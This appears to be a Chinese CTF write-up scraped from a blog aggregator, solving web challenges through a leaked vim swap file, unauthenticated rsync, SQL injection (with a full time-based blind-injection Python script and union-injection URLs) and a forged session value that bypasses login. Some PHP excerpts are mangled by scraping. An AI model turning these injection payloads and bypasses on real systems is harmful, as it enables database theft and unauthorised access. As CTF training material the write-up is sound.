Sp4rkW
Sp4rkW

2017秋季赛Web安全测试训练赛wp【安恒】

0x00编辑器的锅

看到题目名字就差不多猜到了,swp文件泄露,http://114.55.36.69:20380/.login.php.swp,下载拿到swp文件,打开虚拟机,启动kali,利用命令行执行vim -r login.php.swp,修复看到源码,很明显的name和password,输入,直接getflag

0x01 服务发现

这题awvs没扫到有啥漏洞,表哥给的提示是rsync漏洞

Nmap扫描了下端口

 2017秋季赛Web安全测试训练赛wp【安恒】_第1张图片

很明显在873端口

参考网上对于这种漏洞的利用方法,

Rsync -avz --port=873 118.178.18.181::”source code”/flag.php /root/桌面

搞定flag(靠印象写的,目录不确定了,应该没错)

 

0x02 babysql

 

这个题目,,,很尴尬,首先选的注入点是id,不需要’或”的闭合,直接and可以执行,通过盲注搞定数据库名和表名,代码如下:

__author__ = 'netfish'

# -*-coding:utf-8-*-

 

import requests

import time

 

payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.{}-'  #不区分大小写的

 

flag = ""

key=0

print("Start")

for i in range(1,12):

    if key == 1:

        break

    for payload in range(30,125):

        starttime = time.time()#记录当前时间

        headers = {'Host': '114.55.36.69:20680',

'Pragma': 'no-cache',

'Cache-Control': 'no-cache',

'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36',

'Upgrade-Insecure-Requests': '1',

'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',

'Accept-Encoding': 'gzip, deflate',

'Accept-Language': 'zh-CN,zh;q=0.8',

'Connection': 'close'

                   }

        # url = "http://114.55.36.69:20680/index.php?table=&id=3 and case when(ascii(substr(database(),{0},1))={1}) then sleep(7) else sleep(0) end#".format(i,payload)#数据库

        '''

        [Finally] current database is errorerror

        '''

        #url = "http://114.55.36.69:20680/index.php?table=&id=3 and case when((select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>0) then sleep(5) else sleep(0) end#"

        '''

        手动测试长度,第一个长度为10,limit 0,1

        [Finally] current table is error_flag

        手动测试长度,第二个长度为10,limit 1,1

        [Finally] current table is error_news

        手动测试不存在第三个表

        '''

        #url = "http://114.55.36.69:20680/index.php?table=&id=3 and case when(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),{0},1))={1}) then sleep(7) else sleep(0) end#".format(i,payload)

 

 

        #url ="http://114.55.36.69:20680/index.php?table=&id=3 and case when((select length(extractvalue(0x3C613E636f6c756d6e5f6e616d653C2F613E,0x2f61)) from information_schema.columns where table_name=extractvalue(0x3C613E6572726f725f666c61673C2F613E,0x2f61) limit 0,1)>10) then sleep(7) else sleep(0) end#"

        '''

        手动测试第一个字段长度为11

        [Finally] column is column_name

        '''

        url = "http://114.55.36.69:20680/index.php?table=&id=3 and case when(ascii(substr((select (extractvalue(0x3C613E636f6c756d6e5f6e616d653C2F613E,0x2f61)) from information_schema.columns where table_name=extractvalue(0x3C613E6572726f725f666c61673C2F613E,0x2f61) limit 0,1),{0},1))={1}) then sleep(7) else sleep(0) end#".format(i,payload)

 

        res = requests.get(url, headers=headers)

        if time.time() - starttime > 7:

            flag += chr(payload)

            print('\n column is:', flag)

            break

        else:

            if payload == 125:

                key = 1

                break

print('\n[Finally] column table is %s' % flag)

然后很气的就是*和information_column都被过滤了,,,,很尴尬的绕过过程就不说了,,,蜜汁尴尬

 

之后就是先实验了表哥提示的`和报错注入,,,一直没有太多发现,不过研究`的时候发现了很多很有意思的事,`的注入(也不知道是不是注入,各种很神奇的发现)比如`#`与`%23`

后来表哥给了个table没有过滤information_column,利用`可以成功用where的提示,然后就开始了稀里糊涂的尝试

http://114.55.36.69:20680/index.php?table=news`%23`where%201=1%20and%20sleep(3)%23&id=3

成功执行,本来想着继续sleep盲注的,后来想到这是有回显的,可不可以直接select

http://114.55.36.69:20680/index.php?table=news`%23`where%201=2%20union%20(select%201,2,column_name%20from%20information_schema.columns%20where%20table_name=extractvalue(0x3C613E6572726f725f666c61673C2F613E,0x2f61)%20limit%200,1)%20%23&id=3

 

几个点吧,

第一个是前面where弄成1=2,这样union联合查询只有后面的数据

第二个是select要用1,2,column_name,这里有个报错,查了下百度,解释是union联合查询的查询数量不一样,按照最早测试的id可以有3个,1,2,3都有回显,所以确定前面的查询数量为3,这里补上1,2,满足查询三个

第三个点是error_flag需要绕过,,,,不说了不说了,extractvalue函数

第四个点是因为用了limit,因为逗号的原因,所以加上括号说明下执行顺序

 

,,,搞到字段名,,,坑啊,猜了好久的表名,怪不得猜不出来了flag_you_will_never_know,剩下的没啥好说的了,利用表名直接拿字段,flag出来

 

0x03 babylogin

想太多想太多,这题的感觉只有这个,思路后来想想还是很清晰的,倒推数据,直接搞定,md5那条路走不通,走的是__session这条路

代码如下:

第一部分,倒推代码:

"1'='1",

    "hash"=>true

);

$data = json_encode($session, JSON_FORCE_OBJECT);

echo $data;

$finally_data = base64_encode($data);

echo $finally_data;

第二部分,源码审计:

 

 

 $value) {

        $_GPC[$key2]=$value;

    }

}

/*

KEY2 1

$_GPC['']

*/

/*

 $value) {

    echo "Key: $key; Value: $value
\n";

}

?>

Key: 0; Value: one


Key: 1; Value: two


Key: 2; Value: three


*/

//var_dump($_GPC);exit();

if ($_SERVER["REQUEST_METHOD"]=="GET"){#尝试使用get方式,未获取什么有效信息,只是直接跳转首页

    echo include "outputtpl.php";

}else if($_SERVER["REQUEST_METHOD"]=="POST"){

    

    $userin=addslashes($_POST["name"]);#在每个双引号(")前添加反斜杠

    $passin=addslashes($_POST["password"]);

    $session = json_decode(base64_decode($_GPC['__session']), true);#json_decode接受一个 JSON 编码的字符串并且把它转换为 PHP 变量,变成数组 ;base64_decode对 base64 编码的 data 进行解码;$_GPC 全局请求变量, 获取 $_GET, $_POST, $_COOKIES 中的变量

    if (is_array($session)){

        $user = find_user_by_uid($session['uid']);

        if(is_array($user) && $session['hash'] == $user['password']){

            $_SESSION["login"]=1;

            $_SESSION["userin"]=$userin;

            header("Location: admin.php");

            exit();

        }else{

            echo "用户名或密码错误";

        }

    }else{

        $sql = "select password from admin where username='$userin'";

        $row = mysql_fetch_array(mysql_query($sql));

        if($row){

            if($row[$passin]==md5($passin)){

                $_SESSION["login"]=1;

                $_SESSION["userin"]=$userin;

                header("Location: admin.php");

                exit();

            }else{

                echo "用户名或密码错误";

            }

        }else{

            echo "用户名或密码错误";

        }    

    }

}else {

    echo "GET or POST plz!";

}

 

 

 

 

 

核心思想:sql注入,true弱口令

 

 

 

 

你可能感兴趣的:(ctf相关)

  • buuctf[极客大挑战 2019]BabySQL--联合注入、双写过滤 三角恐龙 ctf数据库web安全
    目录1、测试万能密码:2、判断字段个数3、尝试联合注入4、尝试双写过滤5、继续尝试列数6、查询数据库和版本信息7、查询表名8、没有找到和ctf相关的内容,查找其他的数据库9、查看ctf数据库中的表10、查询Flag表中的字段名11、查询表中的内容1、测试万能密码:1'or'1'='1失败2、判断字段个数1’orderby3#"or"和“by”被过滤3、尝试联合注入Payload:1’unionse
  • edge浏览器导入BurpSuite CA证书(第一篇博客) 乔泽绘音 http
    1.下载证书打开burp选择Proxy选择第一个直接下一步就行在保存时要注意在文件名后加后缀cer2.导入浏览器点击管理证书在受信任的颁发机构里导入刚才下载的证书即可。从电脑只是用来打游戏到两个月前开始学c语言,到现在...仍是个菜鸟所以我为什么要发这篇博客呢缘由在到了学校之后在一股神秘力量的驱使下,接触到了CTF相关的知识。虽然我可能比较愚钝,但这方面我是真喜欢。加入他们当然要经过各种考核,所以
  • pwn栈溢出-基本ROP dounine
    0.前言接触ctf一年有余,作为一名ctf老菜鸟,没写过一篇ctf相关博客,确实不该。本文介绍pwn入门操作————基本ROP,主要用于自我笔记,不包含详细原理细节。1.pwn入门必备知识:python汇编链接推荐书籍:《深入理解计算机》第二、三、六、七、八、九章如果以上知识不牢固,相信我,你是根本pwn不动的。2.基本ROPROP(ReturnOrientedProgramming),属于栈溢出
  • 2022-第六届”蓝帽杯“全国大学生网络安全技能大赛 wp(WriteUp) im-Miclelson CTFwpweb安全安全
    2022-第六届”蓝帽杯“全国大学生网络安全技能大赛wp(WriteUp)微信公众号:我是Miclelson会持续更新CTF相关内容。手机取证_1-电子取证现对一个苹果手机进行取证,请您对以下问题进行分析解答。627604C2-C586-48C1-AA16-FF33C3022159.PNG图片的分辨率是?(答案参考格式:1920x1080)附件下载地址见平台公告,解压密码为0ba6b2c094cb
  • 网络安全和CTF相关内容 JT_Zero 安全网络安全
    学习的地方很多,不能一一列举,一些优秀的网址和博客可能也没有提到,大家补充吧:P就简单总结一些常用的吧,本人是十足的彩笔,还望大家多多指点,表哥们带我飞Orzhttp://www.sec-wiki.com/skill/安全技能(里面渗透逆向编程都有介绍)http://blog.knownsec.com/Knownsec_RD_Checklist/知道创宇研发技能表v3.0安全编程方面的不太清楚,问
  • CTF相关资料 simeon2015
    CTF题目:https://github.com/Winter3un/ctf_taskhttp://www.panduoduo.net/u/bd-3977589149https://github.com/ctfshttp://www.captf.com/practice-ctfctf密码专栏:http://www.secbox.cn/hacker/ctf/8078.htmlhttp://www.s
  • CTF训练平台及资源汇总 Azesinte 信息汇总网络安全CTF
    截至2021.1个人收集的CTF相关的资源网址,训练平台等先说国外的,可能需要fqbWAPPCryptopals-CryptographicprogrammingchallengesCTFChallengeCTF365(这网站似乎已经没了CTFlearnCTFTimeEnigmaGroupGameofHacksGoogleGruyere-VulnerablewebappGoogleXSSGame-
  • PythonSocket学习 kkzzjx Python
    学pythoning没怎么更ctf相关的blogudp发送数据importsockets=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)s.sendto('hello'.encode('utf-8'),("192.168.253.1",9090))s.close()sendto有两个参数,data:要发送的二进制数据;address:参数为元组,元组
  • Linux kernel pwn notes(内核漏洞利用学习) weixin_30326741
    前言对这段时间学习的linux内核中的一些简单的利用技术做一个记录,如有差错,请见谅。相关的文件https://gitee.com/hac425/kernel_ctf相关引用已在文中进行了标注,如有遗漏,请提醒。环境搭建对于ctf中的pwn一般都是给一个linux内核文件和一个busybox文件系统,然后用qemu启动起来。而且我觉得用qemu调试时gdb的反应比较快,也没有一些奇奇怪怪的问题。所
  • CTF工业信息安全大赛实践与分析 CanMeng'Blog
    本篇文章主要结合作者工控信息安全及工控网络攻防平台CTF赛题编制等工作经验,首先对上周团队参与的2019工业信息安全大赛CTF线上比赛部分题目进行解析与总结,接着对CTF相关知识及平台进行介绍,最后对CTF收集的相关资源进行分享。我也是从今年开始接触CTF,所以写这篇文章的目的是希望能跟大家一起学习探讨工控安全CTF比赛相关知识。一、概述近年来,伴随着中国制造2025、两化融合及工业互联网等一系列
  • 转 信安之路 CTF初识与深入 xuchen16 ctf
    转自:http://myh0st.cn/index.php/archives/40/感谢公众号:信安之路myh0st授权发布,这个公众号的文章坚持技术分享,推荐大家加一下哦!感受:坚持学习+技术实践总能找到自己的路!这段时间一直在忙活CTF相关的东西,从参赛者到出题人,刷过一些题,也初步了解了出题人的逻辑;这篇文章就简单地讲一下CTF如何入门以及如何深入的学习、利用CTF这个训练、学习平台。文章里
  • CTF中常用工具大全 王大泥巴 CTF
    最近开始学习CTF相关的知识,对各类工具进行一个下载地址汇总,或转载或看到合适的都会列出来,慢慢更新。ReverseEngineering:GDB–http://www.gnu.org/software/gdb/download/IDAPro–https://www.hex-rays.com/products/ida/support/download.shtmlImmunityDebugger–h
  • 想学习CTF的一定要看这篇,让你学习效率提升80% 合天智汇 CTF
    在学习CTF过程中你是否遇到这样的情况:下定决心想要学习CTF,不知道从哪里开始?找了一堆CTF相关的知识学习,但是知识点太凌乱,没有统一明确的学习路径。又或者理论学习完,没有相应的实操环境?合天网安实验室针对上述问题推出的CTF实验室,或许能为你解决这些问题,相信它是你学习CTF不错的选择,为什么这么说呢?理由一:明确的学习路径CTF实验室从6个CTF题目类型出发,为每个题目类型都规划了一条系统
  • 想学习CTF的一定要看这篇,让你学习效率提升80% 合天智汇
    在学习CTF过程中你是否遇到这样的情况:下定决心想要学习CTF,不知道从哪里开始?找了一堆CTF相关的知识学习,但是知识点太凌乱,没有统一明确的学习路径。又或者理论学习完,没有相应的实操环境?合天网安实验室针对上述问题推出的CTF实验室,或许能为你解决这些问题,相信它是你学习CTF不错的选择,为什么这么说呢?理由一:明确的学习路径CTF实验室从6个CTF题目类型出发,为每个题目类型都规划了一条系统
  • 2019-11-17 有关于我淡出CTF圈,转战Web开发、架构与算法的一些想法 __江文__
    现在咱们不讨论技术,而是来聊一聊最近发生的一些事情和以后的主要方向。总是思考技术其实也是一件很累脑子的事情。我其实很不擅长写与人相关的文章,这或许也和我自闭的性格有关——喜欢与技术打交道多于与人打交道。但是时间越久,我越觉得写这篇文章是很有必要的。所以思前想后,还是来写了。前言其实应该有不少人是因为我在CTF方面的一些文章而关注我的。这几天我也简单翻了翻以前的文章,确实,CTF相关的很多文章阅读量
  • Spring4.1新特性——综述 jinnianshilongnian spring 4.1
    目录 Spring4.1新特性——综述 Spring4.1新特性——Spring核心部分及其他 Spring4.1新特性——Spring缓存框架增强 Spring4.1新特性——异步调用和事件机制的异常处理 Spring4.1新特性——数据库集成测试脚本初始化 Spring4.1新特性——Spring MVC增强 Spring4.1新特性——页面自动化测试框架Spring MVC T
  • Schema与数据类型优化 annan211 数据结构mysql
    目前商城的数据库设计真是一塌糊涂,表堆叠让人不忍直视,无脑的架构师,说了也不听。 在数据库设计之初,就应该仔细揣摩可能会有哪些查询,有没有更复杂的查询,而不是仅仅突出 很表面的业务需求,这样做会让你的数据库性能成倍提高,当然,丑陋的架构师是不会这样去考虑问题的。 选择优化的数据类型 1 更小的通常更好 更小的数据类型通常更快,因为他们占用更少的磁盘、内存和cpu缓存,
  • 第一节 HTML概要学习 chenke htmlWebcss
    第一节 HTML概要学习 1. 什么是HTML HTML是英文Hyper Text Mark-up Language(超文本标记语言)的缩写,它规定了自己的语法规则,用来表示比“文本”更丰富的意义,比如图片,表格,链接等。浏览器(IE,FireFox等)软件知道HTML语言的语法,可以用来查看HTML文档。目前互联网上的绝大部分网页都是使用HTML编写的。 打开记事本 输入一下内
  • MyEclipse里部分习惯的更改 Array_06 eclipse
    继续补充中---------------------- 1.更改自己合适快捷键windows-->prefences-->java-->editor-->Content Assist-->      Activation triggers for java的右侧“.”就可以改变常用的快捷键 选中 Text
  • 近一个月的面试总结 cugfy 面试
    本文是在学习中的总结,欢迎转载但请注明出处:http://blog.csdn.net/pistolove/article/details/46753275 前言       打算换个工作,近一个月面试了不少的公司,下面将一些面试经验和思考分享给大家。另外校招也快要开始了,为在校的学生提供一些经验供参考,希望都能找到满意的工作。 
  • HTML5一个小迷宫游戏 357029540 html5
         通过《HTML5游戏开发》摘抄了一个小迷宫游戏,感觉还不错,可以画画,写字,把摘抄的代码放上来分享下,喜欢的同学可以拿来玩玩! <html> <head> <title>创建运行迷宫</title> <script type="text/javascript"
  • 10步教你上传githib数据 张亚雄 git
    官方的教学还有其他博客里教的都是给懂的人说得,对已我们这样对我大菜鸟只能这么来锻炼,下面先不玩什么深奥的,先暂时用着10步干净利索。等玩顺溜了再用其他的方法。 操作过程(查看本目录下有哪些文件NO.1)ls (跳转到子目录NO.2)cd+空格+目录 (继续NO.3)ls (匹配到子目录NO.4)cd+ 目录首写字母+tab键+(首写字母“直到你所用文件根就不再按TAB键了”) (查看文件
  • MongoDB常用操作命令大全 adminjun mongodb操作命令
    成功启动MongoDB后,再打开一个命令行窗口输入mongo,就可以进行数据库的一些操作。输入help可以看到基本操作命令,只是MongoDB没有创建数据库的命令,但有类似的命令 如:如果你想创建一个“myTest”的数据库,先运行use myTest命令,之后就做一些操作(如:db.createCollection('user')),这样就可以创建一个名叫“myTest”的数据库。 一
  • bat调用jar包并传入多个参数 aijuans
    下面的主程序是通过eclipse写的: 1.在Main函数接收bat文件传递的参数(String[] args)  如:   String ip =args[0];          String user=args[1];       &nbs
  • Java中对类的主动引用和被动引用 ayaoxinchao java主动引用对类的引用被动引用类初始化
      在Java代码中,有些类看上去初始化了,但其实没有。例如定义一定长度某一类型的数组,看上去数组中所有的元素已经被初始化,实际上一个都没有。对于类的初始化,虚拟机规范严格规定了只有对该类进行主动引用时,才会触发。而除此之外的所有引用方式称之为对类的被动引用,不会触发类的初始化。虚拟机规范严格地规定了有且仅有四种情况是对类的主动引用,即必须立即对类进行初始化。四种情况如下:1.遇到ne
  • 导出数据库 提示 outfile disabled BigBird2012 mysql
    在windows控制台下,登陆mysql,备份数据库:   mysql>mysqldump -u root -p test test > D:\test.sql 使用命令 mysqldump 格式如下: mysqldump -u root -p *** DBNAME > E:\\test.sql。 注意:执行该命令的时候不要进入mysql的控制台再使用,这样会报
  • Javascript 中的 && 和 || bijian1013 JavaScript&&||
            准备两个对象用于下面的讨论 var alice = { name: "alice", toString: function () { return this.name; } } var smith = { name: "smith",
  • [Zookeeper学习笔记之四]Zookeeper Client Library会话重建 bit1129 zookeeper
    为了说明问题,先来看个简单的示例代码:   package com.tom.zookeeper.book; import com.tom.Host; import org.apache.zookeeper.WatchedEvent; import org.apache.zookeeper.ZooKeeper; import org.apache.zookeeper.Wat
  • 【Scala十一】Scala核心五:case模式匹配 bit1129 scala
    package spark.examples.scala.grammars.caseclasses object CaseClass_Test00 { def simpleMatch(arg: Any) = arg match { case v: Int => "This is an Int" case v: (Int, String)
  • 运维的一些面试题 yuxianhua linux
    1、Linux挂载Winodws共享文件夹   mount -t cifs //1.1.1.254/ok /var/tmp/share/ -o username=administrator,password=yourpass 或 mount -t cifs -o username=xxx,password=xxxx //1.1.1.1/a /win    
  • Java lang包-Boolean BrokenDreams boolean
             Boolean类是Java中基本类型boolean的包装类。这个类比较简单,直接看源代码吧。 public final class Boolean implements java.io.Serializable,
  • 读《研磨设计模式》-代码笔记-命令模式-Command bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ import java.util.ArrayList; import java.util.Collection; import java.util.List; /** * GOF 在《设计模式》一书中阐述命令模式的意图:“将一个请求封装
  • matlab下GPU编程笔记 cherishLC matlab
    不多说,直接上代码 gpuDevice % 查看系统中的gpu,,其中的DeviceSupported会给出matlab支持的GPU个数。 g=gpuDevice(1); %会清空 GPU 1中的所有数据,,将GPU1 设为当前GPU reset(g) %也可以清空GPU中数据。 a=1; a=gpuArray(a); %将a从CPU移到GPU中 onGP
  • SVN安装过程 crabdave SVN
    SVN安装过程   subversion-1.6.12   ./configure --prefix=/usr/local/subversion --with-apxs=/usr/local/apache2/bin/apxs --with-apr=/usr/local/apr --with-apr-util=/usr/local/apr --with-openssl=/
  • sql 行列转换 daizj sql行列转换行转列列转行
    行转列的思想是通过case when 来实现 列转行的思想是通过union all 来实现 下面具体例子: 假设有张学生成绩表(tb)如下: Name Subject Result 张三 语文  74 张三 数学  83 张三 物理  93 李四 语文  74 李四 数学  84 李四 物理  94 */ /* 想变成 姓名   &
  • MySQL--主从配置 dcj3sjt126com mysql
    linux下的mysql主从配置: 说明:由于MySQL不同版本之间的(二进制日志)binlog格式可能会不一样,因此最好的搭配组合是Master的MySQL版本和Slave的版本相同或者更低, Master的版本肯定不能高于Slave版本。(版本向下兼容) mysql1  : 192.168.100.1    //master mysq
  • 关于yii 数据库添加新字段之后model类的修改 dcj3sjt126com Model
    rules: array('新字段','safe','on'=>'search') 1、array('新字段', 'safe')//这个如果是要用户输入的话,要加一下, 2、array('新字段', 'numerical'),//如果是数字的话 3、array('新字段', 'length', 'max'=>100),//如果是文本 1、2、3适当的最少要加一条,新字段才会被
  • sublime text3 中文乱码解决 dyy_gusi Sublime Text
    sublime text3中文乱码解决 原因:缺少转换为UTF-8的插件 目的:安装ConvertToUTF8插件包 第一步:安装能自动安装插件的插件,百度“Codecs33”,然后按照步骤可以得到以下一段代码: import urllib.request,os,hashlib; h = 'eb2297e1a458f27d836c04bb0cbaf282' + 'd0e7a30980927
  • 概念了解:CGI,FastCGI,PHP-CGI与PHP-FPM geeksun PHP
    CGI CGI全称是“公共网关接口”(Common Gateway Interface),HTTP服务器与你的或其它机器上的程序进行“交谈”的一种工具,其程序须运行在网络服务器上。 CGI可以用任何一种语言编写,只要这种语言具有标准输入、输出和环境变量。如php,perl,tcl等。 FastCGI FastCGI像是一个常驻(long-live)型的CGI,它可以一直执行着,只要激活后,不
  • Git push 报错 "error: failed to push some refs to " 解决 hongtoushizi git
    Git push 报错 "error: failed to push some refs to " . 此问题出现的原因是:由于远程仓库中代码版本与本地不一致冲突导致的。 由于我在第一次git pull --rebase 代码后,准备push的时候,有别人往线上又提交了代码。所以出现此问题。 解决方案: 1: git pull    2:
  • 第四章 Lua模块开发 jinnianshilongnian nginxlua
    在实际开发中,不可能把所有代码写到一个大而全的lua文件中,需要进行分模块开发;而且模块化是高性能Lua应用的关键。使用require第一次导入模块后,所有Nginx 进程全局共享模块的数据和代码,每个Worker进程需要时会得到此模块的一个副本(Copy-On-Write),即模块可以认为是每Worker进程共享而不是每Nginx Server共享;另外注意之前我们使用init_by_lua中初
  • java.lang.reflect.Proxy liyonghui160com
      1.简介   Proxy 提供用于创建动态代理类和实例的静态方法 (1)动态代理类的属性 代理类是公共的、最终的,而不是抽象的 未指定代理类的非限定名称。但是,以字符串 "$Proxy" 开头的类名空间应该为代理类保留 代理类扩展 java.lang.reflect.Proxy 代理类会按同一顺序准确地实现其创建时指定的接口
  • Java中getResourceAsStream的用法 pda158 java
    1.Java中的getResourceAsStream有以下几种: 1. Class.getResourceAsStream(String path) : path 不以’/'开头时默认是从此类所在的包下取资源,以’/'开头则是从ClassPath根下获取。其只是通过path构造一个绝对路径,最终还是由ClassLoader获取资源。   2. Class.getClassLoader.get
  • spring 包官方下载地址(非maven) sinnk spring
    SPRING官方网站改版后,建议都是通过 Maven和Gradle下载,对不使用Maven和Gradle开发项目的,下载就非常麻烦,下给出Spring Framework jar官方直接下载路径:   http://repo.springsource.org/libs-release-local/org/springframework/spring/   s
  • Oracle学习笔记(7) 开发PLSQL子程序和包 vipbooks oraclesql编程
        哈哈,清明节放假回去了一下,真是太好了,回家的感觉真好啊!现在又开始出差之旅了,又好久没有来了,今天继续Oracle的学习!      这是第七章的学习笔记,学习完第六章的动态SQL之后,开始要学习子程序和包的使用了……,希望大家能多给俺一些支持啊!     编程时使用的工具是PLSQL
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他